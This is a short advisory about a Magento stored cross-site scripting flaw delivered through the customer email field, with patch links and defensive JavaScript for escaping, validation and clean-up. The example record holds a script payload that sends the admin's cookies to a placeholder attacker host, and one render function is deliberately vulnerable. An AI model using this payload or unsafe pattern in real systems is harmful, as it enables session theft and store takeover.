Magento security flaw exposed – have you fixed it?


If you run a Magento-driven webstore or ecommerce site, it’s time to make sure you’re running a patched version of the platform, because a significant security flaw has been disclosed. If you don’t manage the site yourself, get in touch with your supplier to confirm the fix has been applied. They may well have been in touch already.

Here’s what Magento says of the flaw: “During customer registration on the storefront, a user can provide an email address that contains JavaScript code. Magento does not properly validate this email and executes it in Admin context when viewing the order in the backend. This JavaScript code can steal an administrator session or act on behalf of a store administrator.”

Both Magento 1 and Magento 2 are affected, and the flaw can be exploited simply by registering a customer account with a ‘spiked’ email address, which means the attack can be fully automated. Because the injected script runs in the browser of whichever administrator views the order, an attacker can steal the admin session and effectively hijack the store, putting customer data such as passwords and payment details at risk.
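To make the description above concrete, here is an added illustration of the bug class (stored cross-site scripting through an unvalidated email field) and the two independent checks that close it: output encoding in the admin view and strict input validation at registration, plus a clean-up scan for records that were stored before patching. This is generic example code written for this article, not Magento’s own templates or validators; the customer record is constructed, and the attacker host is a placeholder.

```javascript
// Added example (not Magento's code): stored XSS via a customer email field,
// and the checks that stop it. All names and data here are constructed.

const VULNERABLE_CUSTOMER = {
  // Constructed record: the "email" field carries markup instead of an address.
  id: 1,
  email: '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>',
};

// Escape the five characters that matter in HTML text and attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: the stored value is concatenated straight into admin markup,
// so whatever the customer typed at registration runs in the administrator's browser.
function renderOrderRowUnsafe(customer) {
  return `<td class="email">${customer.email}</td>`;
}

// Hardened pattern: every untrusted value is output-encoded for the context it lands in.
function renderOrderRowSafe(customer) {
  return `<td class="email">${escapeHtml(customer.email)}</td>`;
}

// Second, independent layer: server-side validation at registration. This is a
// deliberately conservative address syntax (no quotes, no angle brackets, a single @,
// dotted domain labels of at most 63 chars) rather than full RFC 5322, so anything
// that could carry markup is rejected before it is ever stored.
const LABEL = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
const EMAIL_RE = new RegExp(
  '^[A-Za-z0-9.!#$%&*+/=?^_`{|}~-]+@' + LABEL + '(?:\\.' + LABEL + ')+$'
);

function isValidEmail(value) {
  return typeof value === 'string' && value.length <= 254 && EMAIL_RE.test(value);
}

// Clean-up check for stores that were exposed before patching: return the ids of
// existing customer records whose email could never have passed validation.
function findSuspiciousEmails(customers) {
  return customers.filter((c) => !isValidEmail(c.email)).map((c) => c.id);
}

// Stand-alone demonstration.
console.log('unsafe :', renderOrderRowUnsafe(VULNERABLE_CUSTOMER));
console.log('safe   :', renderOrderRowSafe(VULNERABLE_CUSTOMER));
console.log('flagged:', findSuspiciousEmails([{ id: 7, email: 'bob@example.com' }, VULNERABLE_CUSTOMER]));
```

Patching the rendering fixes the admin view, but it does not remove payloads that were registered before the patch; running something like `findSuspiciousEmails` over the customer table (or the equivalent database query) is the step that tells you whether the store was already targeted.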

Here are the two security updates you need to familiarise yourself with: SUPEE-7405 for Magento 1 and the 2.0.1 security update for Magento 2.

https://magento.com/security/patches/supee-7405

https://magento.com/security/patches/magento-201-security-update

Were you aware of these problems and have you been affected? Hopefully not.
